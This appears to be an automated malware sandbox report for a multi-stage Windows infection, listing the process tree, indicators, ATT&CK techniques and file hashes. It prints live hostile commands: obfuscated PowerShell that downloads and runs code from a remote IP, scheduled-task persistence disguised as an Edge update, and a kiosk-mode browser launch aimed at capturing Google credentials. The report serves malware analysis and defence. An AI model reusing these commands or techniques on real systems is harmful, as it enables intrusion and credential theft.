1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 1500 chrome.exe 2028 FunnyJellyfish.tmp -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 2180 firefox.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe 4316 f7af1ddf66.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2180 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 4632 1664 file.exe 82 PID 1664 wrote to memory of 4632 1664 file.exe 82 PID 1664 wrote to memory of 4632 1664 file.exe 82 PID 4632 wrote to memory of 2224 4632 skotes.exe 91 PID 4632 wrote to memory of 2224 4632 skotes.exe 91 PID 4632 wrote to memory of 2224 4632 skotes.exe 91 PID 4632 wrote to memory of 876 4632 skotes.exe 92 PID 4632 wrote to memory of 876 4632 skotes.exe 92 PID 4632 wrote to memory of 876 4632 skotes.exe 92 PID 4632 wrote to memory of 1556 4632 skotes.exe 93 PID 4632 wrote to memory of 1556 4632 skotes.exe 93 PID 4632 wrote to memory of 1556 4632 skotes.exe 93 PID 4632 wrote to memory of 4316 4632 skotes.exe 95 PID 4632 wrote to memory of 4316 4632 skotes.exe 95 PID 4632 wrote to memory of 4316 4632 skotes.exe 95 PID 4316 wrote to memory of 4228 4316 f7af1ddf66.exe 96 PID 4316 wrote to memory of 4228 4316 f7af1ddf66.exe 96 PID 4316 wrote to memory of 4228 4316 f7af1ddf66.exe 96 PID 4316 wrote to memory of 4988 4316 f7af1ddf66.exe 99 PID 4316 wrote to memory of 4988 4316 f7af1ddf66.exe 99 PID 4316 wrote to memory of 4988 4316 f7af1ddf66.exe 99 PID 4316 wrote to memory of 184 4316 f7af1ddf66.exe 101 PID 4316 wrote to memory of 184 4316 f7af1ddf66.exe 101 PID 4316 wrote to memory of 184 4316 f7af1ddf66.exe 101 PID 4316 wrote to memory of 4620 4316 f7af1ddf66.exe 103 PID 4316 wrote to memory of 4620 4316 f7af1ddf66.exe 103 PID 4316 wrote to memory of 4620 4316 f7af1ddf66.exe 103 PID 4316 wrote to memory of 4708 4316 f7af1ddf66.exe 105 PID 4316 wrote to memory of 4708 4316 f7af1ddf66.exe 105 PID 4316 wrote to memory of 4708 4316 f7af1ddf66.exe 105 PID 4316 wrote to memory of 3660 4316 f7af1ddf66.exe 107 PID 4316 wrote to memory of 3660 4316 f7af1ddf66.exe 107 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 3660 wrote to memory of 2180 3660 firefox.exe 108 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 PID 2180 wrote to memory of 1248 2180 firefox.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\1007999001\e08b96fbcb.exe"C:\Users\Admin\AppData\Local\Temp\1007999001\e08b96fbcb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2224 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1500 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcf92acc40,0x7ffcf92acc4c,0x7ffcf92acc585⤵PID:2500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2044 /prefetch:25⤵PID:1636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1844,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2088 /prefetch:35⤵PID:5116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1824,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:85⤵PID:5580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:15⤵
- Uses browser remote debugging
PID:1092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:15⤵
- Uses browser remote debugging
PID:5824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,16732844195809621739,1642843251622492062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4592 /prefetch:15⤵
- Uses browser remote debugging
PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6928
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:7444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 18004⤵
- Program crash
PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008000001\25b65f1027.exe"C:\Users\Admin\AppData\Local\Temp\1008000001\25b65f1027.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\1008001001\9e75be4c98.exe"C:\Users\Admin\AppData\Local\Temp\1008001001\9e75be4c98.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\1008002001\f7af1ddf66.exe"C:\Users\Admin\AppData\Local\Temp\1008002001\f7af1ddf66.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:184
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {05492c3f-8f63-4215-85ff-07af5a389b8e} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" gpu6⤵PID:1248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d8e37b6-4e6b-4c6e-8091-6cc5bcea4f9d} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" socket6⤵PID:1480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 3108 -prefMapHandle 3316 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4fde3ad-eac4-447a-a57f-69b7bd0ebc8a} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" tab6⤵PID:4628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -childID 2 -isForBrowser -prefsHandle 3732 -prefMapHandle 3720 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c459930-4a57-472e-a49a-75addba5a4f5} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" tab6⤵PID:2704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4196 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4304 -prefMapHandle 4296 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b35f2c00-5787-4def-b39c-5b4bb4eed965} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" utility6⤵
- Checks processor information in registry
PID:5144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5392 -childID 3 -isForBrowser -prefsHandle 5384 -prefMapHandle 5220 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d83e1a5-785c-49d4-8388-5290f29feed8} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" tab6⤵PID:3424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5576 -childID 4 -isForBrowser -prefsHandle 5656 -prefMapHandle 5652 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {054ce1a6-d422-405e-9522-4c88798d628c} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" tab6⤵PID:1384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 5 -isForBrowser -prefsHandle 5800 -prefMapHandle 5808 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adb6f97b-8b78-47c9-8b6c-57f874d2a019} 2180 "\\.\pipe\gecko-crash-server-pipe.2180" tab6⤵PID:4376
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008003001\6e351fa038.exe"C:\Users\Admin\AppData\Local\Temp\1008003001\6e351fa038.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:620 -
C:\Users\Admin\AppData\Local\Temp\is-ABJE4.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-ABJE4.tmp\FunnyJellyfish.tmp" /SL5="$802B8,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1632 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES5⤵
- System Location Discovery: System Language Discovery
PID:5540 -
C:\Windows\SysWOW64\timeout.exetimeout /T 36⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5396
-
-
C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\is-852AS.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-852AS.tmp\FunnyJellyfish.tmp" /SL5="$602AA,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2028 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5192 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{A5F213B2-F8D6-44BB-C19A-66C6B6DF6518}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"3⤵
- Executes dropped EXE
PID:2356 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵
- Checks computer location settings
PID:4200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5604 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:3984
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5632 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns6⤵
- Gathers network information
PID:4572
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:6124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5548
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2224 -ip 22241⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7804
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6080
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD55e0b043ae837c3a17771dddc6e292c4f
SHA18e2b006e8202bde3046020902ca4613bfa303612
SHA256a33a2506b15ab9847df0f1d8adbc6aa7d12bb2b52ee8d2bc102dc80d20ff71e0
SHA5129d7c646348e8a02a3fae1e0f7fc519e933ba692cf217ef570625de82994551b2a617b437e4109b6f620d455eb3f8df5113ce8390d30dd21d9e6fea364b40b35c
-
Filesize
1KB
MD5a4339230bbff4fd2352b7a83f2487d95
SHA1f1c8bd94afc89b60bacc6d65da54249a3c95ec58
SHA256c5d77eff6f96aa305aa3907e7f3420c286ed5af9b699834867434b315bf1ba15
SHA512d1ba40fe6822ecf819b42826de504de9eeabc86ff55a7e6b828d005d352a64653143f68217152790e465bdb4756643f4890d42cf9c166f02acfac0fad6692d5e
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\activity-stream.discovery_stream.json
Filesize19KB
MD5a102610380770015f69a32c63f646fe5
SHA1ce3a0a12add2016b5990abf09369b4b578a816b0
SHA2566a5d234a107a7e2cbc25c85938713a8de2489765b9596fa8afd82cf11efc33c2
SHA512a2152631e0fbdc610005493628c2c0183e1cc0bf8b675c9cb6ed9adc7c69cfcfa567fef06762c070d704c95ac79d04768d7a80b83f68a92b83baaebc272d906f
-
